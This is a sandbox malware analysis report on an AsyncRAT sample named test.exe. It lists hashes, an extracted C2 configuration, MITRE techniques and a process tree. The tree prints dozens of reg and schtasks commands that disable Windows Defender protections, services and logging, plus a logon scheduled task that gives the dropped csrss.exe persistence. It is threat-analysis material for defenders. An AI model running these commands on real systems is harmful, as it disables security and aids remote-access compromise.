Resubmissions
28-06-2024 21:31
240628-1dj7rswanm 1028-06-2024 21:30
240628-1cwjeasfjf 1028-06-2024 21:23
240628-z8y4qssdrg 1028-06-2024 21:14
240628-z3lw8avfpn 10Analysis
-
max time kernel
159s -
max time network
166s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28-06-2024 21:23
Static task
static1
General
-
Target
test.exe
-
Size
101KB
-
MD5
8eab3abc6963ebf4446c5e5aa559f1d4
-
SHA1
5901818505035554b05204b2575aebfcde196d35
-
SHA256
d01b020acbaee9457d161a79b852932cc192a2dde3d47ac14292eab667aee068
-
SHA512
d55786d83c067fbe8d39537496979b3a3fb92ee87b16f39caa0795c9eef1eb7d354636058569c870a93e8f1888c6f3ee5e75d978dda9b31ae062de47fb306432
-
SSDEEP
3072:gvGyYiSDnt1lD5ScJk3sVkwqAOOwOfHQ:E41YCQ/lhVOfw
Malware Config
Extracted
asyncrat
1.0.7
Default
127.0.0.1:8848
185.188.183.18:8848
DbNvcWoLvbqX
-
delay
1
-
install
true
-
install_file
csrss.exe
-
install_folder
%AppData%
Signatures
-
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe -
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\svchost.exe family_asyncrat -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
dllhost.exesvchost.exedllhost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation dllhost.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation dllhost.exe -
Executes dropped EXE 6 IoCs
Processes:
dllhost.exesvchost.execsrss.exesvchost.exedllhost.exesvchost.exepid process 4784 dllhost.exe 3080 svchost.exe 2032 csrss.exe 4908 svchost.exe 5104 dllhost.exe 3312 svchost.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
test.exetest.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" test.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" test.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1624 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
svchost.execsrss.exepid process 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 3080 svchost.exe 2032 csrss.exe 2032 csrss.exe 2032 csrss.exe 2032 csrss.exe 2032 csrss.exe 2032 csrss.exe 2032 csrss.exe 2032 csrss.exe 2032 csrss.exe 2032 csrss.exe 2032 csrss.exe 2032 csrss.exe 2032 csrss.exe 2032 csrss.exe -
Suspicious behavior: LoadsDriver 10 IoCs
Processes:
pid 4 4 4 4 4 680 4 4 4 4 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
svchost.execsrss.exedescription pid process Token: SeDebugPrivilege 3080 svchost.exe Token: SeDebugPrivilege 2032 csrss.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
test.execmd.exedescription pid process target process PID 2296 wrote to memory of 336 2296 test.exe cmd.exe PID 2296 wrote to memory of 336 2296 test.exe cmd.exe PID 336 wrote to memory of 2448 336 cmd.exe openfiles.exe PID 336 wrote to memory of 2448 336 cmd.exe openfiles.exe PID 336 wrote to memory of 4012 336 cmd.exe reg.exe PID 336 wrote to memory of 4012 336 cmd.exe reg.exe PID 336 wrote to memory of 1136 336 cmd.exe reg.exe PID 336 wrote to memory of 1136 336 cmd.exe reg.exe PID 336 wrote to memory of 3948 336 cmd.exe reg.exe PID 336 wrote to memory of 3948 336 cmd.exe reg.exe PID 336 wrote to memory of 3464 336 cmd.exe reg.exe PID 336 wrote to memory of 3464 336 cmd.exe reg.exe PID 336 wrote to memory of 2576 336 cmd.exe reg.exe PID 336 wrote to memory of 2576 336 cmd.exe reg.exe PID 336 wrote to memory of 5108 336 cmd.exe reg.exe PID 336 wrote to memory of 5108 336 cmd.exe reg.exe PID 336 wrote to memory of 4744 336 cmd.exe reg.exe PID 336 wrote to memory of 4744 336 cmd.exe reg.exe PID 336 wrote to memory of 864 336 cmd.exe reg.exe PID 336 wrote to memory of 864 336 cmd.exe reg.exe PID 336 wrote to memory of 368 336 cmd.exe reg.exe PID 336 wrote to memory of 368 336 cmd.exe reg.exe PID 336 wrote to memory of 2240 336 cmd.exe reg.exe PID 336 wrote to memory of 2240 336 cmd.exe reg.exe PID 336 wrote to memory of 1004 336 cmd.exe reg.exe PID 336 wrote to memory of 1004 336 cmd.exe reg.exe PID 336 wrote to memory of 2564 336 cmd.exe reg.exe PID 336 wrote to memory of 2564 336 cmd.exe reg.exe PID 336 wrote to memory of 836 336 cmd.exe reg.exe PID 336 wrote to memory of 836 336 cmd.exe reg.exe PID 336 wrote to memory of 2500 336 cmd.exe reg.exe PID 336 wrote to memory of 2500 336 cmd.exe reg.exe PID 336 wrote to memory of 2880 336 cmd.exe reg.exe PID 336 wrote to memory of 2880 336 cmd.exe reg.exe PID 336 wrote to memory of 2852 336 cmd.exe reg.exe PID 336 wrote to memory of 2852 336 cmd.exe reg.exe PID 336 wrote to memory of 1032 336 cmd.exe reg.exe PID 336 wrote to memory of 1032 336 cmd.exe reg.exe PID 336 wrote to memory of 5028 336 cmd.exe reg.exe PID 336 wrote to memory of 5028 336 cmd.exe reg.exe PID 336 wrote to memory of 492 336 cmd.exe reg.exe PID 336 wrote to memory of 492 336 cmd.exe reg.exe PID 336 wrote to memory of 1064 336 cmd.exe reg.exe PID 336 wrote to memory of 1064 336 cmd.exe reg.exe PID 336 wrote to memory of 4392 336 cmd.exe reg.exe PID 336 wrote to memory of 4392 336 cmd.exe reg.exe PID 336 wrote to memory of 3972 336 cmd.exe reg.exe PID 336 wrote to memory of 3972 336 cmd.exe reg.exe PID 336 wrote to memory of 1784 336 cmd.exe schtasks.exe PID 336 wrote to memory of 1784 336 cmd.exe schtasks.exe PID 336 wrote to memory of 3920 336 cmd.exe schtasks.exe PID 336 wrote to memory of 3920 336 cmd.exe schtasks.exe PID 336 wrote to memory of 3720 336 cmd.exe schtasks.exe PID 336 wrote to memory of 3720 336 cmd.exe schtasks.exe PID 336 wrote to memory of 4856 336 cmd.exe schtasks.exe PID 336 wrote to memory of 4856 336 cmd.exe schtasks.exe PID 336 wrote to memory of 3420 336 cmd.exe schtasks.exe PID 336 wrote to memory of 3420 336 cmd.exe schtasks.exe PID 336 wrote to memory of 4484 336 cmd.exe reg.exe PID 336 wrote to memory of 4484 336 cmd.exe reg.exe PID 336 wrote to memory of 4476 336 cmd.exe reg.exe PID 336 wrote to memory of 4476 336 cmd.exe reg.exe PID 336 wrote to memory of 4628 336 cmd.exe reg.exe PID 336 wrote to memory of 4628 336 cmd.exe reg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\test.exe"C:\Users\Admin\AppData\Local\Temp\test.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\SYSTEM32\cmd.execmd /c main.bat2⤵
- Suspicious use of WriteProcessMemory
PID:336 -
C:\Windows\system32\openfiles.exeopenfiles3⤵PID:2448
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
PID:4012 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f3⤵PID:1136
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f3⤵PID:3948
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:3464
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f3⤵PID:2576
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:5108
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:4744
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f3⤵PID:864
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f3⤵PID:368
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:2240
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1004 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2564 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:836 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2500 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2880 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2852 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:1032
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:5028
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:492
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:1064
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:4392
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:3972
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:1784
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:3920
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:3720
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:4856
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:3420
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:4484
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:4476
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:4628
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:3140
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:688
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4844
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:3776
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4908
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1576
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:1624 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dllhost.exedllhost.exe3⤵
- Checks computer location settings
- Executes dropped EXE
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3080 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"' & exit5⤵PID:2068
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:1060 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA505.tmp.bat""5⤵PID:4036
-
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:1624 -
C:\Users\Admin\AppData\Roaming\csrss.exe"C:\Users\Admin\AppData\Roaming\csrss.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1016 --field-trial-handle=2244,i,11878111470816612087,2265290141962607370,262144 --variations-seed-version /prefetch:81⤵PID:2384
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2016
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"1⤵
- Executes dropped EXE
PID:4908
-
C:\Users\Admin\AppData\Local\Temp\test.exe"C:\Users\Admin\AppData\Local\Temp\test.exe"1⤵
- Adds Run key to start application
PID:3192 -
C:\Windows\SYSTEM32\cmd.execmd /c main.bat2⤵PID:2908
-
C:\Windows\system32\openfiles.exeopenfiles3⤵PID:4744
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
PID:4000 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f3⤵PID:1004
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f3⤵PID:216
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1332 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f3⤵PID:4500
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:4528
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:1140
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f3⤵PID:756
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f3⤵PID:4484
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:1968
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2924 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3644 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1804 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4480 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4244 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3800 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:3848
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:4340
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:3156
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:4304
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:688
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:4560
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:4968
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:4316
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:1848
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:4608
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:4744
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:2500
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:216
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:3004
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:384
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:1140
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1336
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:936
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2924
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:3644
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:1804 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dllhost.exedllhost.exe3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5104 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"4⤵
- Executes dropped EXE
PID:3312
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
425B
MD5fff5cbccb6b31b40f834b8f4778a779a
SHA1899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA5121a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9
-
Filesize
90KB
MD5f75acc31206c792c4831f9aa52404b2b
SHA1c1380e151eba78a3ec395f46d76fbcd273c10afe
SHA2567aaa38f2e289da72c6dc9b61d4951f34badc693798560f69ad42944eb470dbfd
